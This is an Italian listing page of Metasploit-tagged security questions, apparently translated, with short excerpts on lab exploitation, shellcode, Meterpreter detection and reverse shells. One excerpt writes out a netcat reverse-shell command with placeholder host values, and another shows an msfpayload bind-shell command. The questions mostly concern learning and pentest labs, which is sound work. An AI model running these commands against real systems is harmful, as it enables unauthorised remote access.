Domande con tag 'metasploit'

1
risposta

Come funzionano esattamente i processi "nascosti" [chiuso]

Come può essere nascosto un processo in un altro? Il processo è stato spostato in un altro processo e trasformato in un thread con il proprio ciclo di esecuzione? In che modo viene spostato esattamente un processo? Vedo questo comando Meta...
posta 26.09.2016 - 14:19
5
risposte

Sfruttare attraverso una porta filtrata

Sto facendo un pentecoste contro una macchina che il docente ha allestito in laboratorio. NMAP mostra la porta 445 da filtrare e Nessus conferma che la vulnerabilità ms08_067 è presente su quella macchina. Ho provato a eseguire Metasploit con...
posta 10.03.2014 - 21:05
2
risposte

Strumenti / metodi che aiutano a determinare l'applicazione / protocollo che serve una porta specifica

Faccio i blackbox test del server e capisco che ci sono un sacco di porte d'ascolto. Devo determinare quali servizi / protocolli vengono utilizzati per tali porte. Quello che ho provato finora è usare Armitage (per quanto ho capito, esegue al...
posta 28.08.2012 - 15:46
2
risposte

codice sorgente dei payload metasploit (shellcode)

C'è un modo per vedere un codice sorgente dei codici shell metasploit. Ad esempio: root@kali:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C /* * windows/shell_bind_tcp - 341 bytes * http://www.metasploit.com * VERBOSE=fal...
posta 28.09.2014 - 15:02
1
risposta

Come posso abusare delle informazioni dell'enumerazione dei servizi DCE?

Nessus riporta quasi su qualsiasi macchina Windows "l'enumerazione del servizio DCE". Con il modulo metasploit tcp_dcerpc_auditor ottengo le seguenti informazioni: 192.168.1.23 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135...
posta 09.07.2013 - 14:50
1
risposta

Come potrei trasformare una shell telnet aperta in una sessione Metasploit?

Sto provando a girare usando un sistema metasploitable2, che ha una porta shell aperta in una scansione: port status service 1524/tcp open shell L'accesso alla shell di root è abbastanza semplice in telnet, o anche usan...
posta 28.08.2018 - 15:45
2
risposte

Snort regole per rilevare le sessioni Meterpreter

Sto imparando durante la configurazione di Snort, la mia configurazione consiste in un utente malintenzionato (Linux), una vittima (smartphone Android) e un sistema di rilevamento (IDS). Finora, sono stato in grado di registrare tutti i pacchett...
posta 14.07.2016 - 07:03
2
risposte

Connessione inversa Metasploitable 2 - Kali Linux (Samba 3.x) senza Metasploit

Sto cercando di sfruttare Metasploitable 2 senza l'utilizzo di Metasploit, con l'obiettivo di imparare. In questo caso, mi sto concentrando su Samba 3.x (Port TCP 139, 445) In questo link link vengono spiegati due metodi diversi per sfrutta...
posta 08.01.2018 - 18:22
2
risposte

Come eseguire exploit / windows / local / bypassuac usando AutoRunScript?

C'è un modo per eseguire exploit che richiedono parametri, come quello nel titolo, usando AutoRunScript? Sono riuscito a utilizzare AutoRunScript per eseguire perfettamente alcuni comandi di post, come keylog_recorder o checkvm ....
posta 03.11.2015 - 02:18
2
risposte

Pentest: gestisce più shell inverse

Sto facendo un pentest e mi aspetto che le shell inverse da più shell si connetteranno come: - nc <my-ip> <my-port> -e /bin/bash Tuttavia, sto cercando di capire il modo migliore per gestire queste connessioni in entrata. Ci son...
posta 07.12.2013 - 14:52